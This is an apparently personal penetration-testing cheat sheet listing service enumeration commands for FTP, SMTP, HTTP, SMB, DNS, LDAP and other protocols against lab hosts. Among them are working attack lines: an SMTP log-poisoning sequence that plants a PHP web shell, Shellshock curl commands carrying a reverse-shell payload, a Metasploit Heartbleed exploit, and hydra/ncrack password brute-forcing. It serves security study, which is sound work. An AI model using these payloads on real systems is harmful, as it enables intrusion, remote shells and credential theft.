Enumeration

Good Enumeration Guides:

Kali Linux Cheat Sheet for Penetration TestersblackMORE Ops

Home · theonlykernel/enumeration WikiGitHub

HackTricksHackTricks

FTP

nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 

ncFTP:

# apt install ncftp
ncftp 10.10.10.115

SSH

Tutorial from g0tmi1k

Debia OpenSSH Weak SSH keys
https://blog.g0tmi1k.com/2010/04/pwnos/

SMTP

SMTP is a server to server service. The user receives or sends emails using IMAP or POP3. Those messages are then routed to the SMTP-server which communicates the email to another server. The SMTP-server has a database with all emails that can receive or send emails. We can use SMTP to query that database for possible email-addresses. Notice that we cannot retrieve any emails from SMTP. We can only send emails.

Commands:
HELO - 
EHLO - Extended SMTP.
STARTTLS - SMTP communicted over unencrypted protocol. By starting TLS-session we encrypt the traffic.  
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify is the email user's mailbox exists.

We can manually try to find out which usernames are in the database. This can be done in the following way.

nc 192.168.1.103 25                                                                               

220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
VRFY root
252 2.0.0 root
VRFY roooooot
550 5.1.1 <roooooot>: Recipient address rejected: User unknown in local recipient table

Here we have managed to identify the user root. But roooooot was rejected. VRFY, EXPN and RCPT can be used to identify users. Telnet is a bit more friendly some times. So always use that too

telnet 10.11.1.229 25

Using nmap to automate the enumeration of users.

nmap -script smtp-commands.nse 192.168.1.101

nmap –script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vulncve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1 

# Using the smtp-user-enum tool.  
# -M for mode. -U for userlist. -t for target

smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 192.168.1.103    

Using SMTP for log contamination. Watch the video from ippsec on Beep

telnet 10.10.10.7 25
EHLO ippsec.beep.htb
VRFY asterisk@localhost
### if successful, then:
mail from:pwned@haha.io
rcpt to: asterisk@localhost
data
Subject: You have been pwned
<? echo system($_REQUEST['ipp']); ?>

.
250 2.0.0 Ok: queue as 03655D92F7

Then:
GET /example/page?=../../../../../../../var/mail/asterisk%00&module=Accounts&action?ipp=ls      

HTTP

Check ippsec video on Shocker

Shellshock

# Shellshock
nmap --scrip shellshock --script-args uri=/cgi-bin -p 80 10.10.10.15

# Testing Shellshock using curl
curl -x 10.10.10.15 -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" TARGETADDRESS/cgi-bin/status
curl -x 10.10.10.15:8080 -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.28.169/1234 0>&1" 192.168.28.167/cgi-bin/status

#Shellshock over SSH
ssh username@10.10.10.15 '() { :;}; /bin/bash'

Nikto

# Nikto
nikto -h 10.10.10.10

Gobuster

# Gobuster
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux

# Specifying a user agent
gobuster -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'  

# searching for specifc extensions
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php

WordPress Scanner

# WPScan
wpscan -u 10.10.10.10/wp/

WebDAV Scanner

# Davtest
davtest -url http://10.11.1.15

HTTPS

# Heartbleed Vuln status of different versions:
OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
OpenSSL 1.0.1g is NOT vulnerable
OpenSSL 1.0.0 branch is NOT vulnerable
OpenSSL 0.9.8 branch is NOT vulnerable

# Checking if a page is vulnerable to heartbleed
sslscan 192.168.101.1:443
or
nmap -sV --script=ssl-heartbleed 192.168.101.8

# You can also exploit the vulnerability using Burp and Metasploit
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS 192.168.101.8
set verbose true
run

POP3

To login:
telnet 10.11.1.13 110
USER adam
PASS adam123

To list messages:
LIST

To retrieve message:
RETR

To exit:
QUIT

RPC

nmap -p 111 –script=rcpinfo 10.11.1.13   

rpcclient -U "" -N 10.10.10.8

rcpinfo -p 10.11.1.13 

rcpclient -U username 10.11.1.13 

Commands: 
srvinfo 
enum  
enumalsgroups 
enumdomains 
enumdrivers 
enumkey
enumprivs 
enumdata
enumdomgroups 
enumforms 
enumports 
enumtrust 
enumdataex 
enumdomusers 
enumjobs 
enumprinter 
lookupnames administrator 
queryuser 500 

SMB

Enumeration and vulnerability scanning with nmap. Add your target IP address after pasting the command in your terminal.

nmap -p 139,445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse

nmap -p 139,445 -vv --script vuln 

nmap -p 139,445 -vv --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enumprocesses.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enumusers.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-printtext.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smbsystem-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vulnms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse    

nmap -p 139,445 -vv --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 

Using smbmap

smbmap -H 10.11.1.128 -u Admin -p "Password" 
smbmap -H 10.11.1.13 
smbmap -H 10.11.1.13 -u Doesnexist

Using smbclient

smbclient -L //10.11.1.13 
smbclient -L //10.11.1.13/ipc$ -U John 
smbclient \\10.11.1.13\Admin$ -U john

Mount the smb share

mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/sharename /mnt/cifs   
mount -t cifs -o user=admin -o vers=1.0 //10.11.1.128/share smb

Check smb file sharing

showmount -e 10.11.1.128

crackmapexec

crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users  

NFS

# enumerate share
showmount -e 10.10.11.12


# Mounting the share
mount -t nfs 192.168.100.25:/home /tmp/infosec


https://resources.infosecinstitute.com/exploiting-nfs-share/
https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ 

SNMP

snmpwalk -c public -v1 10.0.0.0

snmpcheck -t 192.168.1.X -c public

onesixtyone -c names -i hosts

nmap -sT -p 161 192.168.X.X -oG snmp_results.txt

snmpenum -t 192.168.1.X

MySQL

nmap -sV -Pn -vv -p 3306 --script mysql-audit,mysqldatabases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysqlquery,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1   

SQL Server

Reference: https://pentestlab.blog/category/exploitation-techniques/

nmap -p1433 10.10.10.16 –script ms-sql-brute –script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt  

DNS

Important DNS records:

A (address) records:  containing the IP address of the domain.
MX records:  stands for Mail Exchange, contain the mail exchange servers.
CNAME records:  used for aliasing domains. CNAME stands for Canonical Name and links any sub-domains with existing domain DNS records.
NS records:  which stands for Name Server, indicates the authoritative (or main) name server for the domain.
SOA records:  which stands for State of Authority, contain important information about the domain such as the primary name server, a timestamp showing when the domain was last updated and the party responsible for the domain.  
PTR or Pointer Records:  map an IPv4 address to the CNAME on the host. This record is also called a ‘reverse record’ because it connects a record with an IP address to a hostname instead of the other way around.
TXT records:  contain text inserted by the administrator (such as notes about the way the network has been configured).

# Zone Transfer
dig axfr megacorp.local @10.10.10.179

# Windows:
nslookup
set type=any
ls -d blah.com

# DNS IP Lookup
dig a <domain-name-here.com> @<dns-server-here>

# MX Record Lookup
dig mx <domain-name-here.com> @<dns-server-here>

# Whois Enumeration
whois <domain-name-here>

# DNSRecon Tool
dnsrecon -d 10.11.1.13 -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
#Zone Transfer
dnsrecon -d example.com -t axfr

# Find Active Directory using DNS
nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='labs.test.com'"

Telnet

hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt 192.168.1.101 telnet  

RDP

ncrack -vv --user administrator -P passwords.txt rdp://192.168.1.10,CL=1 

# Then use rdesktop to login
rdesktop 192.168.1.10  

LDAP

# You will get whatever object that is at the base of the directory:  
ldapsearch -LLL -x -h ldap.example.com -p 3389 -s base '(objectclass=*)'

# IPSEC - LightWeight
ldapsearch -x -h 10.10.10.107 -s base namingcontext
# Then from the output, you would do:
ldapsearch -x -h 10.10.10.107 -b "dc=hackthebox,dc=htb"

# From Impacket
GetADUsers.py -all -dc-ip {ip} {domain/username} 

# Nmap using LDAP script
nmap -p 389 --script ldap-search ypuffy.htb

Kerberos

Kerberoasting -> GetNPUsers.py

Good references on kerberos exploitation:

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

https://www.tarlogic.com/en/blog/how-to-attack-kerberos/